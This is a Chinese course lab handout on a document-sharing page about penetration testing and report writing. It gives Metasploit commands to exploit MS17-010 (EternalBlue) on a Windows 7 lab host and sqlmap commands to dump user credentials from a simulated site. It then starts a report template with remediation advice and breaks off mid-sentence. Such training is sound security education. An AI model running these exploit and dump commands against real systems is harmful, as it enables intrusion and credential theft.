- 5
- 0
- 约2.17千字
- 约 4页
- 2022-07-12 发布于江西
- 举报
渗透测试报告设计与编写
课程级别
信息安全专业工业互联网安全方向
实验概述
此实验目的是加深渗透测试报告编写流程及内容的理解,并对一次模拟的渗透测试进行渗透测试报告编写。
实验目标
实现简单的系统渗透测试
实现简单的网站渗透测试
实现渗透测试报告编写
预备知识
熟悉渗透测试报告编写的基础知识
建议课时数、
4个课时
实验环境准备
1. kali 2021
2. window7操作系统
实验步骤
某电力监控系统为对其网站系统进行安全评估,邀请你为其进行web服务器和管理网站进行渗透测试。已知该网站系统的web服务器为windows7操作系统,请对其进行简单的渗透测试并编写渗透测试报告。
任务一 系统渗透测试
本实验中,某台web服务器的ip地址为40,
1.进入msfconsole模块
2.选择auxiliary/scanner/smb/smb_ms17_010模块,该模块能够扫描目标主机是否存在MS17-010漏洞。
use auxiliary/scanner/smb/smb_ms17_010
3设置目标机ip
set RHOSTS 40
4.输入run并查看测试结果,可以发现目标主机存在MS17-010漏洞。
5.利用该漏洞对目标主机实施攻击
①加载ms17_010_eternalblue模块
use exploit/windows/smb/ms17_010_eternalblue
②设置目标机ip
set RHOSTS 40
③输入run,显示连接成功,获得了目标机的权限
任务二 网站渗透测试
以墨子仿真靶场模拟该电力监控系统的管理网站
(/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozh)
1.打开kali查看Sqlmap是否正常使用,输入sqlmap。如果出现下图界面则代表sqlmap可以正常使用。
2.找到该网站URL链接后,输入:
sqlmap -u 28:41755/new_list.php?id=tingjigonggao~
检测该URL是否有SQL注入漏洞,发现确实存在SQL注入漏洞。
3.使用自动化SQL注入查询数据库信息。可以发现存在五个数据库,其中有一个是mozhe_discuz_stormgroup的数据库。
sqlmap -u 28:41755/new_list.php?id=tingjigonggao~ -batch -dbs
4.使用自动化SQL注入查询数据库中表的信息。
sqlmap -u 28:41755/new_list.php?id=tingjigonggao~ -batch -D mozhe_discuz_stormgroup -tables
5.使用自动化SQL注入查询数据库中表的信息。发现了stormgroup_member表中有password和id的列。
sqlmap -u 28:41755/new_list.php?id=tingjigonggao~ -batch -D mozhe_discuz_stormgroup -T stormgroup_member -columns
6. 使用自动化SQL注入查询数据库中表的数据。成功查询到账户密码。
sqlmap -u 28:41755/new_list.php?id=tingjigonggao~ -batch -D mozhe_discuz_stormgroup -T stormgroup_member -C name,password -dump
任务三 渗透测试报告编写
以本次实验渗透测试结果编写渗透测试报告。
1.概述
渗透测试对象
某电力监控系统web服务器和管理网站
开始时间
20XX年XX月XX日
结束时间
20XX年XX月XX日
适用性声明
本次渗透测试是某电力监控系统的网站系统进行的安全风险深度评估,根据评估结果所提交的技术报告,用于对该网站系统的安全状况做出安全评估和加固建议,仅限该电力监控系统目标相关内部人员传阅。
2.使用的工具
工具名称
用途简介
Metasploit
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。
Sqlmap
Sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。
3.漏洞摘要
NO
危害等级
漏洞名称
修复建议
1
高
MS17-010
安装永恒之蓝漏洞修复最新补丁或关闭445端口
2
高
SQL注入漏洞
加强对用户输入的验证;普通用户与系统管
您可能关注的文档
- 工控安全职业证书技能实践:服务器安全配置核查与工控设备安全配置核查.pptx
- 工控安全职业证书技能实践:工控安全事件技术对应表设计与编写.pptx
- 工控安全职业证书技能实践:工控设备数据安全权限配置实战.pptx
- 工控安全职业证书技能实践:信息安全事件制度规划.pptx
- 工控安全职业证书技能实践:工控网络安全设备配置实战 - 副本.pptx
- 工控安全职业证书技能实践:工控网络数据安全审计权限配置及实战--数据安全审计.pptx
- 工控安全职业证书技能实践:网络安全评估方案设计与实战.docx
- 工控安全职业证书技能实践:测试路径及测试方法设计与实战 - 副本.docx
- 工控安全职业证书技能实践:网络安全故障分析.pptx
- 工控安全职业证书技能实践:工控网络漏洞修复 - 副本.pptx
- 广东省广州省实验中学教育集团2025-2026学年八年级上学期期中考试物理试题(解析版).docx
- 广东省广州大学附属中学2025-2026学年八年级上学期奥班期中物理试题(解析版).docx
- 广东省广州市第八十六中学2025-2026学年八年级上学期期中物理试题(含答案).docx
- 广东省广州市第八十九中学2025-2026学年八年级上学期期中考试物理试题(解析版).docx
- 广东省广州市第二中学2025-2026学年八年级上学期期中考试物理试题(含答案).docx
- 广东省广州市第八十六中学2025-2026学年八年级上学期期中物理试题(解析版).docx
- 广东省广州市第八十九中学2025-2026学年八年级上学期期中考试物理试题(含答案).docx
- 广东省广州市第二中学2025-2026学年八年级上学期期中考试物理试题(解析版).docx
- 2026《中国人寿上海分公司营销员培训体系优化研究》18000字.docx
- 《生物探究性实验教学》中小学教师资格模拟试题.docx
最近下载
- 《专业工程管理与实务》.pdf VIP
- 中国血栓性疾病防治指南(2025版).docx VIP
- 施工质量日志-.xls VIP
- 2025年国家公务员全国总工会面试题及答案.docx VIP
- 合肥市普通高中六校联盟2025-2026学年高三第一次语文教学质量监测+答案.docx VIP
- 局部晚期食管癌患者新辅助免疫治疗与常规新辅助治疗的比较:系统评价和meta分析.pdf
- 2025以骑手为代表的新就业群体研究报告:职业技能与跑单时长对收入的共同作用.pdf VIP
- 年产一亿片别嘌呤醇的车间工艺设计.doc VIP
- 商务型(带电梯、地下室、效果图)三层别墅设计图.pdf VIP
- 2026年详版个人信用报告征信报告最新Word可编辑模版样板doc文件.docx
原创力文档

文档评论(0)